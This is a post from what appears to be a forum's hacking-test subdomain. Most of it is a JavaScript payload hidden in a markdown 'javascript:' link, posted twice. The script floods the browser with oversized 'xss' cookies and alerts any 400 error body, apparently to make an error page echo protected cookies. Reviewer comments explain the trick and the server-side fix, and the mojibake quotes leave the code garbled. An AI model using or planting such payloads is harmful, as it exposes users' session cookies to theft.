Did you just find a vulnerability?

Hi folks,

You can try your hacks on this subdomain of discuss. It gives you a place to test and, at the same time, helps us keep the main discussion forum clean. :slight_smile:

If you find something, do report it at [email protected]. We have laddus for you. :smiley:

[adsf](javascript: function setCookies (good) {
// NOTE(review): this script is carried in a markdown link whose target uses the
// javascript: scheme, so it can only run if the forum renders that link
// unfiltered; a renderer that allow-lists link schemes would drop it.
// The quote characters in this copy of the post are mis-encoded (mojibake).
//
// setCookies(good): writes ten cookies named xss0..xss9 on path "/".
//   good truthy -> each cookie gets an empty value and a fixed Expires attribute
//                  (presumably the clean-up path that shrinks the cookies again).
//   good falsy  -> each cookie gets a 1819-character filler value, so the ten
//                  together add roughly 18 KB to the Cookie header of later
//                  same-site requests.
var str = β€˜β€™;
// Build the 1819-character filler string used by the large-cookie branch.
for (var i=0; i< 1819; i++) {
str += β€˜x’;
}
// `i` is function-scoped (declared with var above) and is reused here.
for (i = 0; i < 10; i++) {
if (good) {
var cookie = β€˜xss’+i+’=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;’;
} else {
var cookie = β€˜xss’+i+’=’+str+’;path=/’;
}
// Each assignment to document.cookie sets one cookie; it does not replace the others.
document.cookie = cookie;
}
}
function makeRequest() {
// makeRequest(): inflates the xss0..xss9 cookies, then sends an asynchronous
// GET to /api/todo/add and shows the response body only when the status is 400.
// NOTE(review): presumably a check for whether the server rejects the oversized
// Cookie header with a 400 page that echoes request headers back; if it did,
// cookie values that page script cannot normally read would appear in
// responseText. Error responses should not reflect request headers, and the
// header size limit should be enforced with a generic error body.
setCookies(); // no argument, so `good` is undefined and the large-value branch runs
function parseCookies () {
var cookie_dict = {}; // never used again in the visible code
// readyState 4 means the request has completed; only a 400 response is displayed.
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(β€˜GET’, β€˜/api/todo/add’, true);
var params = β€˜pcode=TWEED&ccode=’;
// XMLHttpRequest ignores the body passed to send() for GET requests, so
// `params` is not transmitted.
xhr.send(params);
}
// Runs immediately. ":wink:" is presumably the forum's emoji shortcode for the
// ";)" that ended this statement and closed the markdown link.
makeRequest():wink:

[adsf](javascript: function setCookies (good) {
// NOTE(review): this script is carried in a markdown link whose target uses the
// javascript: scheme, so it can only run if the forum renders that link
// unfiltered; a renderer that allow-lists link schemes would drop it.
// The quote characters in this copy of the post are mis-encoded (mojibake).
//
// setCookies(good): writes ten cookies named xss0..xss9 on path "/".
//   good truthy -> each cookie gets an empty value and a fixed Expires attribute
//                  (presumably the clean-up path that shrinks the cookies again).
//   good falsy  -> each cookie gets a 1819-character filler value, so the ten
//                  together add roughly 18 KB to the Cookie header of later
//                  same-site requests.
var str = β€˜β€™;
// Build the 1819-character filler string used by the large-cookie branch.
for (var i=0; i< 1819; i++) {
str += β€˜x’;
}
// `i` is function-scoped (declared with var above) and is reused here.
for (i = 0; i < 10; i++) {
if (good) {
var cookie = β€˜xss’+i+’=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;’;
} else {
var cookie = β€˜xss’+i+’=’+str+’;path=/’;
}
// Each assignment to document.cookie sets one cookie; it does not replace the others.
document.cookie = cookie;
}
}
function makeRequest() {
// makeRequest(): inflates the xss0..xss9 cookies, then sends an asynchronous
// GET to /api/todo/add and shows the response body only when the status is 400.
// NOTE(review): presumably a check for whether the server rejects the oversized
// Cookie header with a 400 page that echoes request headers back; if it did,
// cookie values that page script cannot normally read would appear in
// responseText. Error responses should not reflect request headers, and the
// header size limit should be enforced with a generic error body.
setCookies(); // no argument, so `good` is undefined and the large-value branch runs
function parseCookies () {
var cookie_dict = {}; // never used again in the visible code
// readyState 4 means the request has completed; only a 400 response is displayed.
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(β€˜GET’, β€˜/api/todo/add’, true);
var params = β€˜pcode=TWEED&ccode=’;
// XMLHttpRequest ignores the body passed to send() for GET requests, so
// `params` is not transmitted.
xhr.send(params);
}
// Runs immediately. ":wink:" is presumably the forum's emoji shortcode for the
// ";)" that ended this statement and closed the markdown link.
makeRequest():wink:

">